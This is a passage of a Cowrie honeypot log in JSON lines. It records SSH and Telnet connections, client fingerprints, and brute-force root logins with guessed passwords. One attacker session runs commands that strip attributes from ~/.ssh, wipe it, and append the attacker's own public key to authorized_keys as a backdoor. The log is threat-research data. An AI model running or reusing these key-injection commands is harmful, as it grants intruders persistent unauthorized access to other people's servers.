{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:49:28.128224Z","src_ip":"45.88.8.215","session":"dbb407ec2c98"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T13:49:28.129026Z","src_ip":"45.88.8.215","session":"dbb407ec2c98"}
{"eventid":"cowrie.login.success","username":"root","password":"Mrinal@123","message":"login attempt [root/Mrinal@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:49:29.440835Z","src_ip":"45.88.8.215","session":"dbb407ec2c98"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:29.990979Z","src_ip":"45.88.8.215","session":"dbb407ec2c98"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51676,"dst_ip":"1.2.3.4","dst_port":22,"session":"730c7666d627","protocol":"ssh","message":"New connection: 217.72.205.35:51676 (1.2.3.4:22) [session: 730c7666d627]","sensor":"my-vps","timestamp":"2025-08-26T13:49:38.584327Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:38.585513Z","src_ip":"217.72.205.35","session":"730c7666d627"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":58966,"dst_ip":"1.2.3.4","dst_port":23,"session":"e20365da75eb","protocol":"telnet","message":"New connection: 123.31.39.100:58966 (1.2.3.4:23) [session: e20365da75eb]","sensor":"my-vps","timestamp":"2025-08-26T13:49:52.390257Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60468,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ddc4ef33af1","protocol":"ssh","message":"New connection: 212.227.125.160:60468 (1.2.3.4:22) [session: 1ddc4ef33af1]","sensor":"my-vps","timestamp":"2025-08-26T13:50:01.189994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:50:01.205624Z","src_ip":"212.227.125.160","session":"1ddc4ef33af1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:50:01.480900Z","src_ip":"212.227.125.160","session":"1ddc4ef33af1"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:50:02.619442Z","src_ip":"212.227.125.160","session":"1ddc4ef33af1"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:50:03.870479Z","src_ip":"212.227.125.160","session":"1ddc4ef33af1"}
{"eventid":"cowrie.session.closed","duration":46.20421028137207,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:50:38.594394Z","src_ip":"123.31.39.100","session":"e20365da75eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42350,"dst_ip":"1.2.3.4","dst_port":22,"session":"68273ee909fe","protocol":"ssh","message":"New connection: 212.227.235.229:42350 (1.2.3.4:22) [session: 68273ee909fe]","sensor":"my-vps","timestamp":"2025-08-26T13:50:39.884048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:50:39.884951Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:50:40.130045Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rdP@ssw0rd","message":"login attempt [root/P@ssw0rdP@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:50:41.165819Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:50:41.731856Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:50:41.732661Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:50:41.733824Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:50:41.980863Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:50:42.532634Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:50:42.533361Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:50:42.795610Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:50:42.796498Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58750,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2a65ce479ce","protocol":"ssh","message":"New connection: 212.227.235.229:58750 (1.2.3.4:22) [session: b2a65ce479ce]","sensor":"my-vps","timestamp":"2025-08-26T13:50:43.044980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:50:43.046096Z","src_ip":"212.227.235.229","session":"b2a65ce479ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:50:43.294313Z","src_ip":"212.227.235.229","session":"b2a65ce479ce"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:50:44.327089Z","src_ip":"212.227.235.229","session":"b2a65ce479ce"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:50:45.578446Z","src_ip":"212.227.235.229","session":"b2a65ce479ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58766,"dst_ip":"1.2.3.4","dst_port":22,"session":"b992465efb62","protocol":"ssh","message":"New connection: 212.227.235.229:58766 (1.2.3.4:22) [session: b992465efb62]","sensor":"my-vps","timestamp":"2025-08-26T13:50:45.816958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:50:45.817846Z","src_ip":"212.227.235.229","session":"b992465efb62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:50:46.057857Z","src_ip":"212.227.235.229","session":"b992465efb62"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:50:47.061356Z","src_ip":"212.227.235.229","session":"b992465efb62"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:50:47.301947Z","src_ip":"212.227.235.229","session":"68273ee909fe"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:50:47.302822Z","src_ip":"212.227.235.229","session":"b992465efb62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32810,"dst_ip":"1.2.3.4","dst_port":22,"session":"26ee4bd229dc","protocol":"ssh","message":"New connection: 212.227.125.160:32810 (1.2.3.4:22) [session: 26ee4bd229dc]","sensor":"my-vps","timestamp":"2025-08-26T13:51:02.716032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:51:02.799850Z","src_ip":"212.227.125.160","session":"26ee4bd229dc"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:51:14.036097Z","src_ip":"212.227.125.160","session":"26ee4bd229dc"}
{"eventid":"cowrie.session.closed","duration":"30.3","message":"Connection lost after 30.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:51:32.978765Z","src_ip":"212.227.125.160","session":"26ee4bd229dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55844,"dst_ip":"1.2.3.4","dst_port":22,"session":"fffed7e9851f","protocol":"ssh","message":"New connection: 212.227.125.160:55844 (1.2.3.4:22) [session: fffed7e9851f]","sensor":"my-vps","timestamp":"2025-08-26T13:51:41.299828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:51:41.343876Z","src_ip":"212.227.125.160","session":"fffed7e9851f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-